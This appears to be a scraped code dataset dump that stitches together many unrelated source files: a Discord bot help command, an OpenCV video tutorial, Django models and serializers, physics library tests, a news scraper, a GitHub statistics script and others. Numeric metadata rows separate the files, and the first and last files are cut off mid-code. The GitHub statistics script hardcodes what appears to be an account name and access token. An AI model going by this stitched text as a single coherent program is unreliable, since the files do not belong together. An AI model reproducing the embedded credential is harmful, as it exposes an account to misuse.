_is_submodule(parent, child): return parent == child or child.startswith(parent + ".") async def _default_help_command(ctx, *commands: str): """Shows this message.""" bot = ctx.bot destination = ctx.message.author if bot.pm_help else ctx.message.channel def repl(obj): return _mentions_transforms.get(obj.group(0), '') # help by itself just lists our own commands. if len(commands) == 0: pages = await bot.formatter.format_help_for(ctx, bot) elif len(commands) == 1: # try to see if it is a cog name name = _mention_pattern.sub(repl, commands[0]) command = None if name in bot.cogs: command = bot.cogs[name] else: command = bot.all_commands.get(name) if command is None: await destination.send(bot.command_not_found.format(name)) return pages = await bot.formatter.format_help_for(ctx, command) else: name = _mention_pattern.sub(repl, commands[0]) command = bot.all_commands.get(name) if command is None: await destination.send(bot.command_not_found.format(name)) return for key in commands[1:]: try: key = _mention_pattern.sub(repl, key) command = command.all_commands.get(key) if command is None: await destination.send(bot.command_not_found.format(key)) return except AttributeError: await destination.send(bot.command_has_no_subcommands.format(command, key)) return pages = await bot.formatter.format_help_for(ctx, command) if bot.pm_help is None: characters = sum(map(len, pages)) # modify destination based on length of pages. if characters > 1000: destination = ctx.message.author for page in pages: try: await destination.send(page) except discord.Forbidden: destination = ctx.message.channel await destination.send(page) old_send = discord.abc.Messageable.send async def send(self, content=None, **kwargs): """Overrides default send method in order to create a paste if the response is more than 2000 characters""" if content is not None and any(x in str(content) for x in ["@everyone", "@here"]): content = content.replace("@everyone", "@\u0435veryone").replace("@here", "@h\u0435re") if content is not None and len(str(content)) > 2000: if content.startswith("```py"): content = "\n".join(content.split("\n")[1:-1]) paste = await privatebin.upload(content, expires="15min", server=self.bot.priv) if self.bot.polr: paste = await polr.shorten(paste, **self.bot.polr) return await old_send(self, f"Hey, I couldn't handle all the text I was gonna send you, so I put it in a paste!" f"\nThe link is **{paste}**, but it expires in 15 minutes, so get it quick!", **kwargs) else: return await old_send(self, content, **kwargs)
gpl-3.0
2,864,970,659,438,636,000
35.380711
120
0.596205
false
4.090753
false
false
false
makelove/OpenCV-Python-Tutorial
ch05-视频/5.VideoPlay.py
1
1329
import numpy as np import cv2 cap = cv2.VideoCapture('../data/vtest.avi') # cap = cv2.VideoCapture('output.avi') # cap = cv2.VideoCapture('Minions_banana.mp4') # 帧率 fps = cap.get(cv2.CAP_PROP_FPS) # 25.0 print("Frames per second using video.get(cv2.CAP_PROP_FPS) : {0}".format(fps)) # 总共有多少帧 num_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT) print('共有', num_frames, '帧') # frame_height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT) frame_width = cap.get(cv2.CAP_PROP_FRAME_WIDTH) print('高:', frame_height, '宽:', frame_width) FRAME_NOW = cap.get(cv2.CAP_PROP_POS_FRAMES) # 第0帧 print('当前帧数', FRAME_NOW) # 当前帧数 0.0 # 读取指定帧,对视频文件才有效,对摄像头无效?? frame_no = 121 cap.set(1, frame_no) # Where frame_no is the frame you want ret, frame = cap.read() # Read the frame cv2.imshow('frame_no'+str(frame_no), frame) FRAME_NOW = cap.get(cv2.CAP_PROP_POS_FRAMES) print('当前帧数', FRAME_NOW) # 当前帧数 122.0 while cap.isOpened(): ret, frame = cap.read() FRAME_NOW = cap.get(cv2.CAP_PROP_POS_FRAMES) # 当前帧数 print('当前帧数', FRAME_NOW) gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) cv2.imshow('frame', gray) key = cv2.waitKey(1) if key == ord("q"): break cap.release() cv2.destroyAllWindows()
mit
7,165,087,056,115,826,000
25.733333
78
0.666667
false
2.110526
false
false
false
ziima/pyvmd
pyvmd/tests/test_analyzer.py
1
2785
""" Tests for trajectory analysis utilities. """ import VMD from mock import sentinel from pyvmd.analyzer import Analyzer from pyvmd.molecules import Molecule from .utils import data, PyvmdTestCase class TestAnalyzer(PyvmdTestCase): """ Test `Analyzer` class. """ def setUp(self): self.mol = Molecule.create() self.mol.load(data('water.psf')) # Storage for callback data self.coords = [] self.frames = [] def test_analyze_callback_args(self): # Test callback is called with extra arguments steps = [] def callback(step, *args, **kwargs): self.assertEqual(step.molecule, self.mol) self.assertEqual(args, (sentinel.arg1, sentinel.arg2)) self.assertEqual(kwargs, {'key': sentinel.value, 'another': sentinel.junk}) steps.append(step.frame) analyzer = Analyzer(self.mol, [data('water.1.dcd')]) analyzer.add_callback(callback, sentinel.arg1, sentinel.arg2, key=sentinel.value, another=sentinel.junk) analyzer.analyze() self.assertEqual(steps, range(12)) def _get_status(self, status): # Callback to collect status data self.frames.append(status.frame) def _get_x(self, status): # Callback to collect data self.coords.append(VMD.atomsel.atomsel('index 0', molid=status.molecule.molid).get('x')[0]) def test_analyze(self): # Test analyzer works correctly with default parameters analyzer = Analyzer(self.mol, [data('water.1.dcd'), data('water.2.dcd')]) analyzer.add_callback(self._get_status) analyzer.add_callback(self._get_x) analyzer.analyze() result = [-1.4911567, -1.4851371, -1.4858487, -1.4773947, -1.4746015, -1.4673382, -1.4535547, -1.4307435, -1.4120502, -1.3853478, -1.3674825, -1.3421925, -1.3177859, -1.2816998, -1.2579591, -1.2262495, -1.2036057, -1.1834533, -1.174916, -1.1693807, -1.1705244, -1.1722997, -1.1759951, -1.175245] self.assertAlmostEqualSeqs(self.coords, result) self.assertEqual(self.frames, range(24)) def test_analyze_params(self): # Test load every other frame, all 12 at once self.coords = [] self.frames = [] analyzer = Analyzer(self.mol, [data('water.1.dcd'), data('water.2.dcd')], step=2, chunk=12) analyzer.add_callback(self._get_status) analyzer.add_callback(self._get_x) analyzer.analyze() result = [-1.4911567, -1.4858487, -1.4746015, -1.4535547, -1.4120502, -1.3674825, -1.3177859, -1.2579591, -1.2036057, -1.174916, -1.1705244, -1.1759951] self.assertAlmostEqualSeqs(self.coords, result) self.assertEqual(self.frames, range(12))
gpl-3.0
6,988,987,339,418,595,000
38.225352
113
0.627289
false
3.234611
true
false
false
mercycorps/tola
htdocs/silo/serializers.py
1
1231
from django.forms import widgets from rest_framework import serializers from silo.models import Silo, Read, ReadType, LabelValueStore, Tag from django.contrib.auth.models import User import json class SiloSerializer(serializers.HyperlinkedModelSerializer): data = serializers.SerializerMethodField() class Meta: model = Silo fields = ('owner', 'name', 'reads', 'description', 'create_date', 'id', 'data','shared','tags','public') depth =1 def get_data(self, obj): link = "/api/silo/" + str(obj.id) + "/data/" return (self.context['request'].build_absolute_uri(link)) class TagSerializer(serializers.HyperlinkedModelSerializer): class Meta: model = Tag fields = ('name', 'owner') class UserSerializer(serializers.HyperlinkedModelSerializer): class Meta: model = User fields = ('url', 'username', 'email', 'is_staff') class ReadSerializer(serializers.HyperlinkedModelSerializer): class Meta: model = Read fields = ('owner', 'type', 'read_name', 'read_url') class ReadTypeSerializer(serializers.HyperlinkedModelSerializer): class Meta: model = ReadType fields = ( 'read_type', 'description')
gpl-2.0
-2,326,723,832,163,240,000
29.04878
112
0.671812
false
4.036066
false
false
false
eighilaza/bouraka
bouraka-django/bouraka/views.py
1
1815
from django.shortcuts import render, get_object_or_404 from django.http import HttpResponse from django.template import RequestContext, loader from news.models import News from slides.models import Slide from django.http import HttpResponseRedirect def home(request): latest_news_list = News.objects.order_by('-publication_date')[:4] try: slide = Slide.objects.get(title='home') except Slide.DoesNotExist: slide = None template = loader.get_template('bouraka/home.html') context = { 'latest_news_list': latest_news_list, 'slide': slide, } return render(request, 'bouraka/home.html', context) def gallery(request): return render(request, 'bouraka/gallery.html') def history(request): return render(request, 'bouraka/history.html') def team(request): return render(request, 'bouraka/team.html') def shell(request): return render(request, 'bouraka/shell.html') def educeco(request): return render(request, 'bouraka/educeco.html') def michelin(request): return render(request, 'bouraka/michelin.html') def futur(request): return render(request, 'bouraka/futur.html') def envol(request): return render(request, 'bouraka/envol.html') def epic(request): return render(request, 'bouraka/epic.html') def orca(request): return render(request, 'bouraka/orca.html') def elec(request): return render(request, 'bouraka/elec.html') def roues(request): return render(request, 'bouraka/roues.html') def moteur(request): return render(request, 'bouraka/moteur.html') def simulateur(request): return render(request, 'bouraka/simulateur.html') def accomplishments(request): return render(request, 'bouraka/accomplishments.html') def contacts(request): return render(request, 'bouraka/contacts.html')
lgpl-3.0
-63,468,116,221,537,944
33.903846
69
0.722865
false
3.336397
false
false
false
beakman/caquitv
external_apps/djangoratings/models.py
1
2158
from django.db import models from django.contrib.contenttypes.models import ContentType from django.contrib.contenttypes import generic from django.contrib.auth.models import User import datetime from managers import VoteManager class Vote(models.Model): content_type = models.ForeignKey(ContentType, related_name="votes") object_id = models.PositiveIntegerField() key = models.CharField(max_length=32) score = models.IntegerField() user = models.ForeignKey(User, blank=True, null=True, related_name="votes") ip_address = models.IPAddressField() date_added = models.DateTimeField(default=datetime.datetime.now, editable=False) date_changed = models.DateTimeField(default=datetime.datetime.now, editable=False) objects = VoteManager() content_object = generic.GenericForeignKey() class Meta: unique_together = (('content_type', 'object_id', 'key', 'user', 'ip_address')) def __unicode__(self): return "%s voted %s on %s" % (self.user_display, self.score, self.content_object) def save(self, *args, **kwargs): self.date_changed = datetime.datetime.now() super(Vote, self).save(*args, **kwargs) def user_display(self): if self.user: return "%s (%s)" % (self.user.username, self.ip_address) return self.ip_address user_display = property(user_display) def partial_ip_address(self): ip = self.ip_address.split('.') ip[-1] = 'xxx' return '.'.join(ip) partial_ip_address = property(partial_ip_address) class Score(models.Model): content_type = models.ForeignKey(ContentType) object_id = models.PositiveIntegerField() key = models.CharField(max_length=32) score = models.IntegerField() votes = models.PositiveIntegerField() content_object = generic.GenericForeignKey() class Meta: unique_together = (('content_type', 'object_id', 'key'),) def __unicode__(self): return "%s scored %s with %s votes" % (self.content_object, self.score, self.votes)
agpl-3.0
-277,736,686,817,290,900
35.576271
91
0.645042
false
3.90942
false
false
false
alexbiehl/SublimeLinter-stack-ghc
linter.py
1
1410
# # linter.py # Linter for SublimeLinter3, a code checking framework for Sublime Text 3 # # Written by Jon Surrell # Copyright (c) 2013 Jon Surrell # # License: MIT # """This module exports the Stack Ghc plugin class.""" from SublimeLinter.lint import Linter, util from os.path import basename class StackGhc(Linter): """Provides an interface to stack ghc.""" syntax = ('haskell', 'haskell-sublimehaskell', 'literate haskell') cmd = ('stack', 'ghc', '--', '-fno-code', '-Wall', '-Wwarn', '-fno-helpful-errors') regex = ( r'^(?P<filename>.+):' r'(?P<line>\d+):(?P<col>\d+):' r'\s+(?P<warning>Warning:\s+)?(?P<message>.+)$' ) multiline = True # No stdin tempfile_suffix = { 'haskell': 'hs', 'haskell-sublimehaskell': 'hs', 'literate haskell': 'lhs' } # ghc writes errors to STDERR error_stream = util.STREAM_STDERR def split_match(self, match): """Override to ignore errors reported in imported files.""" match, line, col, error, warning, message, near = ( super().split_match(match) ) match_filename = basename(match.groupdict()['filename']) linted_filename = basename(self.filename) if match_filename != linted_filename: return None, None, None, None, None, '', None return match, line, col, error, warning, message, near
mit
-9,104,684,087,554,022,000
26.115385
87
0.600709
false
3.414044
false
false
false
walshjon/openmc
openmc/capi/error.py
1
1950
from ctypes import c_int, c_char from warnings import warn from . import _dll class OpenMCError(Exception): """Root exception class for OpenMC.""" class GeometryError(OpenMCError): """Geometry-related error""" class InvalidIDError(OpenMCError): """Use of an ID that is invalid.""" class AllocationError(OpenMCError): """Error related to memory allocation.""" class OutOfBoundsError(OpenMCError): """Index in array out of bounds.""" class DataError(OpenMCError): """Error relating to nuclear data.""" class PhysicsError(OpenMCError): """Error relating to performing physics.""" class InvalidArgumentError(OpenMCError): """Argument passed was invalid.""" class InvalidTypeError(OpenMCError): """Tried to perform an operation on the wrong type.""" def _error_handler(err, func, args): """Raise exception according to error code.""" # Get error code corresponding to global constant. def errcode(s): return c_int.in_dll(_dll, s).value # Get error message set by OpenMC library errmsg = (c_char*256).in_dll(_dll, 'openmc_err_msg') msg = errmsg.value.decode() # Raise exception type corresponding to error code if err == errcode('e_allocate'): raise AllocationError(msg) elif err == errcode('e_out_of_bounds'): raise OutOfBoundsError(msg) elif err == errcode('e_invalid_argument'): raise InvalidArgumentError(msg) elif err == errcode('e_invalid_type'): raise InvalidTypeError(msg) if err == errcode('e_invalid_id'): raise InvalidIDError(msg) elif err == errcode('e_geometry'): raise GeometryError(msg) elif err == errcode('e_data'): raise DataError(msg) elif err == errcode('e_physics'): raise PhysicsError(msg) elif err == errcode('e_warning'): warn(msg) elif err < 0: raise OpenMCError("Unknown error encountered (code {}).".format(err))
mit
8,463,138,787,818,959,000
25.351351
77
0.663077
false
3.931452
false
false
false
vivaxy/algorithms
python/problems/validate_stack_sequences.py
1
1434
""" https://leetcode.com/problems/validate-stack-sequences/ https://leetcode.com/submissions/detail/218117451/ """ from typing import List class Solution: def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool: if pushed == popped: return True a = [] while len(pushed): if len(a) == 0: a.append(pushed.pop(0)) if popped[0] != a[-1]: a.append(pushed.pop(0)) else: popped.pop(0) a.pop() if len(a) != len(popped): return False while len(a): if a.pop() != popped.pop(0): return False return True import unittest class Test(unittest.TestCase): def test(self): solution = Solution() self.assertEqual(solution.validateStackSequences( [1, 2, 3, 4, 5], [4, 5, 3, 2, 1]), True) self.assertEqual(solution.validateStackSequences( [1, 2, 3, 4, 5], [4, 3, 5, 1, 2]), False) self.assertEqual(solution.validateStackSequences( [], []), True) self.assertEqual(solution.validateStackSequences( [1, 0], [1, 0]), True) self.assertEqual(solution.validateStackSequences( [0, 2, 1], [0, 1, 2]), True) if __name__ == '__main__': unittest.main()
mit
2,056,916,776,801,924,600
25.072727
83
0.505579
false
3.695876
true
false
false
ojousima/asylum
project/ndaparser/admin.py
1
2753
from django.contrib import admin from django.core.exceptions import PermissionDenied, ImproperlyConfigured from django.conf.urls import url from django.core.urlresolvers import reverse from django.utils.translation import ugettext_lazy as _ from django.shortcuts import get_object_or_404, render from django.utils.text import capfirst from django.conf import settings from .views import NordeaUploadView from creditor.admin import TransactionAdmin from creditor.handlers import AbstractTransaction from asylum.utils import get_handler_instance class NordeaUploadMixin(object): nda_change_list_template = "ndaparser/admin/change_list.html" view_class = NordeaUploadView def get_urls(self): """Returns the additional urls used by the uploader.""" urls = super().get_urls() admin_site = self.admin_site opts = self.model._meta info = opts.app_label, opts.model_name, my_urls = [ url("^nordea/upload/$", admin_site.admin_view(self.upload_view), name='%s_%s_ndaupload' % info), ] return my_urls + urls def upload_view(self, request, extra_context=None): """Displays a form that can upload transactions form a Nordea "NDA" transaction file.""" # The revisionform view will check for change permission (via changeform_view), # but we also need to check for add permissions here. if not self.has_add_permission(request): # pragma: no cover raise PermissionDenied model = self.model opts = model._meta try: each_context = self.admin_site.each_context(request) except TypeError: # Django <= 1.7 pragma: no cover each_context = self.admin_site.each_context() # Get the rest of the context. context = dict( each_context, opts = opts, app_label = opts.app_label, module_name = capfirst(opts.verbose_name), title = _("Upload Nordea transactions"), transactions_handler = get_handler_instance('TRANSACTION_CALLBACKS_HANDLER') ) context.update(extra_context or {}) view = self.view_class.as_view() return view(request, context=context) def changelist_view(self, request, extra_context=None): context = dict( orig_template = str(getattr(super(), 'change_list_template')), ) context.update(extra_context or {}) self.change_list_template = self.nda_change_list_template return super().changelist_view(request, context) if settings.NORDEA_UPLOAD_ENABLED: # Dynamically inject the mixin to transactions admin TransactionAdmin.__bases__ = (NordeaUploadMixin, ) + TransactionAdmin.__bases__
mit
8,746,984,828,914,234,000
40.712121
108
0.668362
false
4.102832
false
false
false
ArkaneMoose/BotBot
botbot/main.py
1
3722
import sys import re import json import argparse import euphoria as eu from .botbot import BotBot from . import euphutils from . import snapshot room_name = 'testing' password = None nickname = 'BotBot' help_text = '''\ @BotBot is a bot for Euphoria created by @myhandsaretypingwords that creates other bots. Usage ================================================================================ Create a bot with @BotName with some code. !createbot @BotName CODE Same as the previous but specify the room to put the bot in. !createbot &room @BotName CODE List all the bots that are currently running and have been created by @BotBot. !list @BotBot Send a bot with the name @BotName to the specified room. !sendbot &room @BotName Kill a bot with the name @BotName. !kill @BotName Pause a bot with the name @BotName. !pause @BotName Kill all the bots created by @BotBot. !killall @BotName Take a snapshot of the state of @BotBot. !save @BotBot Load the latest snapshot. !load @BotBot latest Load a snapshot with a specific file name. !load @BotBot FILENAME Restart @BotBot. !restart @BotBot More Info ================================================================================ View the @BotBot wiki at https://github.com/ArkaneMoose/BotBot/wiki for a comprehensive guide on how to use @BotBot, including a guide on how to write @BotBot code and a list of features and restrictions that bots created with @BotBot have. Good luck! ================================================================================ Good luck on your journey to becoming a bot programmer. If you need help, you can ask @myhandsaretypingwords, @nihizg, or any of the other awesome Euphorians in &programming for help with any bot-related questions. Have fun, and please be respectful! @BotBot is open-source! Feel free to view the code, contribute, and report issues at https://github.com/ArkaneMoose/BotBot. @BotBot complies with the Euphorian bot standards.\ ''' short_help_text = '''\ @BotBot is a bot for Euphoria created by @myhandsaretypingwords that creates other bots. Type "!help @BotBot" to learn more.\ ''' def main(): botbot = BotBot(room_name, password, nickname, help_text, short_help_text) eu.executable.start(botbot) def get_args(): parser = argparse.ArgumentParser(prog='botbot', description='A meta-bot for Euphoria.', epilog='For details, read the README.md file at https://github.com/ArkaneMoose/BotBot/blob/master/README.md') parser.add_argument('config-file', nargs='?', help='optional path to a JSON configuration file') parser.add_argument('-r', '--room', help='room in Euphoria where @BotBot should reside') parser.add_argument('-p', '--password', help='password for room if necessary') parser.add_argument('-n', '--nickname', help='custom nickname for @BotBot') parser.add_argument('-s', '--snapshot-dir', help='directory where snapshots will be read and written') return parser.parse_args() if __name__ == '__main__': args = vars(get_args()) if args.get('config-file'): with open(args.get('config-file')) as f: config = json.load(f) else: config = {} room_name = args['room'] or config.get('room', room_name) password = args['password'] or config.get('password', password) nickname = args['nickname'] or config.get('nickname', nickname) help_text = config.get('helpText', help_text.replace('@BotBot', euphutils.mention(nickname))) short_help_text = config.get('shortHelpText', short_help_text.replace('@BotBot', euphutils.mention(nickname))) snapshot.snapshot_dir = args['snapshot_dir'] or config.get('snapshotDirectory', snapshot.snapshot_dir) main()
mit
-5,159,026,592,452,285,000
36.979592
201
0.671145
false
3.645446
true
false
false
sirca/bdkd_datastore
datastore/tests/unit/bdkd/datastore/util/test_copy_move.py
1
3291
# Copyright 2015 Nicta # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # coding=utf-8 import unittest import argparse import os # Load a custom configuration for unit testing os.environ['BDKD_DATASTORE_CONFIG'] = os.path.join( os.path.dirname(__file__), '..', '..', '..', 'conf', 'test.conf') from bdkd.datastore.util import ds_util FIXTURES = os.path.join(os.path.dirname(__file__), '..', '..', '..', '..', 'fixtures') class CopyMoveUtilitiesTest(unittest.TestCase): def setUp(self): self.filepath = os.path.join(FIXTURES, 'FeatureCollections', 'Coastlines', 'Seton_etal_ESR2012_Coastlines_2012.1.gpmlz') self.parser = argparse.ArgumentParser() subparser = self.parser.add_subparsers(dest='subcmd') ds_util._create_subparsers(subparser) def test_copy_same_repository_arguments(self): args_in = [ 'copy', 'test-repository', 'from_resource', 'to_resource' ] args = self.parser.parse_args(args_in) self.assertTrue(args) self.assertEquals(args.from_repository.name, 'test-repository') self.assertEquals(args.from_resource_name, 'from_resource') self.assertEquals(args.to_repository, None) self.assertEquals(args.to_resource_name, 'to_resource') def test_copy_across_repositories_arguments(self): args_in = [ 'copy', 'test-repository', 'from_resource', 'test-repository', 'to_resource' ] args = self.parser.parse_args(args_in) self.assertTrue(args) self.assertEquals(args.from_repository.name, 'test-repository') self.assertEquals(args.from_resource_name, 'from_resource') self.assertEquals(args.to_repository.name, 'test-repository') self.assertEquals(args.to_resource_name, 'to_resource') def test_move_same_repository_arguments(self): args_in = [ 'move', 'test-repository', 'from_resource', 'to_resource' ] args = self.parser.parse_args(args_in) self.assertTrue(args) self.assertEquals(args.from_repository.name, 'test-repository') self.assertEquals(args.from_resource_name, 'from_resource') self.assertEquals(args.to_repository, None) self.assertEquals(args.to_resource_name, 'to_resource') def test_move_across_repositories_arguments(self): args_in = [ 'move', 'test-repository', 'from_resource', 'test-repository', 'to_resource' ] args = self.parser.parse_args(args_in) self.assertTrue(args) self.assertEquals(args.from_repository.name, 'test-repository') self.assertEquals(args.from_resource_name, 'from_resource') self.assertEquals(args.to_repository.name, 'test-repository') self.assertEquals(args.to_resource_name, 'to_resource')
apache-2.0
-4,339,567,989,079,044,000
40.658228
83
0.675175
false
3.710259
true
false
false
HIIT/mediacollection
sites/helsinginuutiset.py
1
1658
# -*- coding: utf-8 -*- import requests from bs4 import BeautifulSoup import processor from datetime import datetime def parse( url ): r = requests.get( url ) if r.status_code == 404: return processor.create_dictionary('', url, r.status_code, [u''], [u''], u'', u'', u'', u'', [u''], [u'']) r.encoding = 'UTF-8' soup = BeautifulSoup( r.text, "html.parser" ) article = soup.find( 'article' ) if article == None: return processor.create_dictionary('', url, r.status_code, [u''], [u''], u'', u'', u'', u'', [u''], [u'']) processor.decompose_all( article.find_all( 'script' ) ) departments = article.find( class_ = 'field-name-field-department-tref' ) categories = processor.collect_categories( departments.find_all( 'a' ) ) datetime_list = processor.collect_datetime( article.find( class_ = 'field-name-post-date' ) ) author = article.find( class_ = 'author' ) if author != None: processor.decompose( author.find( class_ = 'img' ) ) author = processor.collect_text( author.find( 'h3' ) ) else: author = u'' title = processor.collect_text( article.find( 'h1' ) ) text = processor.collect_text( article.find( class_ = 'field field-name-body' ) ) images = processor.collect_images_by_parent( article.find_all( class_ = 'img' ), '') captions = processor.collect_image_captions( article.find_all( class_ = 'caption' ) ) return processor.create_dictionary('Helsingin uutiset', url, r.status_code, categories, datetime_list, author, title, u'', text, images, captions) if __name__ == '__main__': parse("http://www.helsinginuutiset.fi/artikkeli/433833-arvio-15-000-ihmista-saa-tana-vuonna-tyopaikan-kunnasta-tarvetta-etenkin")
mit
8,901,220,503,216,206,000
36.681818
147
0.670084
false
2.883478
false
false
false
flrvm/cobratoolbox
.github/github_stats.py
1
1459
from github import Github g = Github("cobrabot", "dd31ac21736aeeaeac764ce1192c17e370679a25") cobratoolbox = g.get_user("opencobra").get_repo("cobratoolbox") contributors = {} for contributor in cobratoolbox.get_stats_contributors(): a = 0 d = 0 c = 0 for week in contributor.weeks: a += week.a d += week.d c += week.c contributors[contributor.author.login] = { 'additions': a, 'deletions': d, 'commits': c, 'avatar': contributor.author.avatar_url} print "name: %20s, additions: %10d, deletions: %10d, commits: %10d" % (contributor.author.login, a, d, c) sorted_by_commits = sorted(contributors.items(), key=lambda x: x[1]['commits']) table = '\n.. raw:: html\n\n <table style="margin:0px auto" width="100%">' for k in range(0, 5): table += """\n <tr> <td width="46px"><img src="%s" width=46 height=46 alt=""></td><td><a href="https://github.com/%s">%s</a></td> <td width="46px"><img src="%s" width=46 height=46 alt=""></td><td><a href="https://github.com/%s">%s</a></td> </tr>""" % (sorted_by_commits[-(2 * k + 1)][1]['avatar'], sorted_by_commits[-(2 * k + 1)][0], sorted_by_commits[-(2 * k + 1)][0], sorted_by_commits[-(2 * (k + 1))][1]['avatar'], sorted_by_commits[-(2 * (k + 1))][0], sorted_by_commits[-(2 * (k + 1))][0]) table += "\n </table>" with open("docs/source/contributors.rst", "w") as readme: readme.write(table)
gpl-3.0
1,395,502,001,221,579,800
40.685714
137
0.58122
false
2.838521
false
false
false
marios-zindilis/musicbrainz-django-models
_build/model.py
1
3430
#!/usr/bin/env python3 import sys try: MODEL_NAME = sys.argv[1] except IndexError: print('Model Name Not Provided') exit(1) MODEL_NAME_TITLE = MODEL_NAME.title().replace('_', ' ') MODEL = 'musicbrainz_django_models/models/{}.py'.format(MODEL_NAME) INIT = 'musicbrainz_django_models/models/__init__.py' SQL = '_etc/CreateTables.sql' SQL_EXISTS = False SQL_TABLE = [] SQL_TABLE_INCLUDES_ID = False SQL_TABLE_INCLUDES_GID = False IMPORTS = [ 'from django.db import models', 'from django.utils.encoding import python_2_unicode_compatible', ] FIELDS = [] GID_DOC = '' MODELS = [] MODEL_TEMPLATE = '''""" .. module:: {MODEL_NAME} The **{MODEL_NAME_TITLE}** Model. PostgreSQL Definition --------------------- The :code:`{MODEL_NAME}` table is defined in the MusicBrainz Server as: .. code-block:: sql {SQL_TABLE} """ {IMPORTS} @python_2_unicode_compatible class {MODEL_NAME}(models.Model): """ Not all parameters are listed here, only those that present some interest in their Django implementation. {GID_DOC} """ {FIELDS} def __str__(self): return self.name class Meta: db_table = '{MODEL_NAME}' ''' with open(SQL, 'r') as sql: for line in sql: if ( line.startswith('CREATE TABLE {} '.format(MODEL_NAME)) or line == 'CREATE TABLE {}\n'.format(MODEL_NAME) ): SQL_EXISTS = True break if not SQL_EXISTS: print('CREATE TABLE {} Not Found'.format(MODEL_NAME)) exit(1) with open(SQL, 'r') as sql: SQL_TABLE_CAPTURE = False for line in sql: if ( line.startswith('CREATE TABLE {} '.format(MODEL_NAME)) or line == 'CREATE TABLE {}\n'.format(MODEL_NAME) ): SQL_TABLE_CAPTURE = True if SQL_TABLE_CAPTURE and line.startswith(');'): SQL_TABLE.append(line) SQL_TABLE_CAPTURE = False break if SQL_TABLE_CAPTURE: if not SQL_TABLE_INCLUDES_ID: SQL_TABLE_INCLUDES_ID = ' serial,' in line.lower() if not SQL_TABLE_INCLUDES_GID: SQL_TABLE_INCLUDES_GID = ' uuid ' in line.lower() SQL_TABLE.append(line) if SQL_TABLE_INCLUDES_ID: FIELDS.append(' id = models.AutoField(primary_key=True)') if SQL_TABLE_INCLUDES_GID: IMPORTS.append('import uuid') FIELDS.append(' gid = models.UUIDField(default=uuid.uuid4)') GID_DOC = """:param gid: this is interesting because it cannot be NULL but a default is not defined in SQL. The default `uuid.uuid4` in Django will generate a UUID during the creation of an instance.""" with open(MODEL, 'w') as model: model.write(MODEL_TEMPLATE.format( MODEL_NAME=MODEL_NAME, MODEL_NAME_TITLE=MODEL_NAME_TITLE, SQL_TABLE=' '.join(SQL_TABLE), IMPORTS='\n'.join(IMPORTS), FIELDS='\n'.join(FIELDS), GID_DOC=GID_DOC )) with open(INIT, 'r') as init: MODELS = [line.split()[-1] for line in init if line.startswith('from ')] MODELS.append(MODEL_NAME) with open(INIT, 'w') as init: for mod in MODELS: init.write('from .{mod} import {mod}\n'.format(mod=mod)) init.write('\n') init.write('# __all__ silences PEP8 `module imported but unused`:\n') init.write('__all__ = [\n') for mod in MODELS: init.write(' {mod},\n'.format(mod=mod)) init.write(']\n')
gpl-2.0
-6,831,984,093,304,596,000
26.66129
91
0.6
false
3.298077
false
false
false
sunqm/pyscf
pyscf/eph/test/test_uhf.py
1
2089
#!/usr/bin/env python # Copyright 2014-2020 The PySCF Developers. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from pyscf import scf, gto from pyscf.eph import eph_fd, uhf import numpy as np import unittest mol = gto.M() mol.atom = [['O', [0.000000000000, -0.000000000775, 0.923671924285]], ['H', [-0.000000000000, -1.432564848017, 2.125164039823]], ['H', [0.000000000000, 1.432564848792, 2.125164035930]]] mol.unit = 'Bohr' mol.basis = 'sto3g' mol.verbose=4 mol.build() # this is a pre-computed relaxed geometry class KnownValues(unittest.TestCase): def test_finite_diff_uhf_eph(self): mf = scf.UHF(mol) mf.conv_tol = 1e-16 mf.conv_tol_grad = 1e-10 mf.kernel() grad = mf.nuc_grad_method().kernel() self.assertTrue(abs(grad).max()<1e-5) mat, omega = eph_fd.kernel(mf) matmo, _ = eph_fd.kernel(mf, mo_rep=True) myeph = uhf.EPH(mf) eph, _ = myeph.kernel() ephmo, _ = myeph.kernel(mo_rep=True) for i in range(len(omega)): self.assertTrue(min(np.linalg.norm(eph[:,i]-mat[:,i]),np.linalg.norm(eph[:,i]+mat[:,i]))<1e-5) self.assertTrue(min(abs(eph[:,i]-mat[:,i]).max(), abs(eph[:,i]+mat[:,i]).max())<1e-5) self.assertTrue(min(np.linalg.norm(ephmo[:,i]-matmo[:,i]),np.linalg.norm(ephmo[:,i]+matmo[:,i]))<1e-5) self.assertTrue(min(abs(ephmo[:,i]-matmo[:,i]).max(), abs(ephmo[:,i]+matmo[:,i]).max())<1e-5) if __name__ == '__main__': print("Full Tests for UHF") unittest.main()
apache-2.0
-3,297,742,572,155,970,000
36.981818
114
0.632839
false
2.97155
true
false
false
noskill/virt-manager
virtManager/config.py
1
25087
# # Copyright (C) 2006, 2012-2014 Red Hat, Inc. # Copyright (C) 2006 Daniel P. Berrange <berrange@redhat.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301 USA. # import os import logging from gi.repository import Gio from gi.repository import GLib from gi.repository import Gtk from virtinst import CPU from .keyring import vmmKeyring, vmmSecret running_config = None class SettingsWrapper(object): def __init__(self, settings_id): self._root = settings_id self._settings = Gio.Settings.new(self._root) self._settingsmap = {"": self._settings} self._handler_map = {} for child in self._settings.list_children(): childschema = self._root + "." + child self._settingsmap[child] = Gio.Settings.new(childschema) def 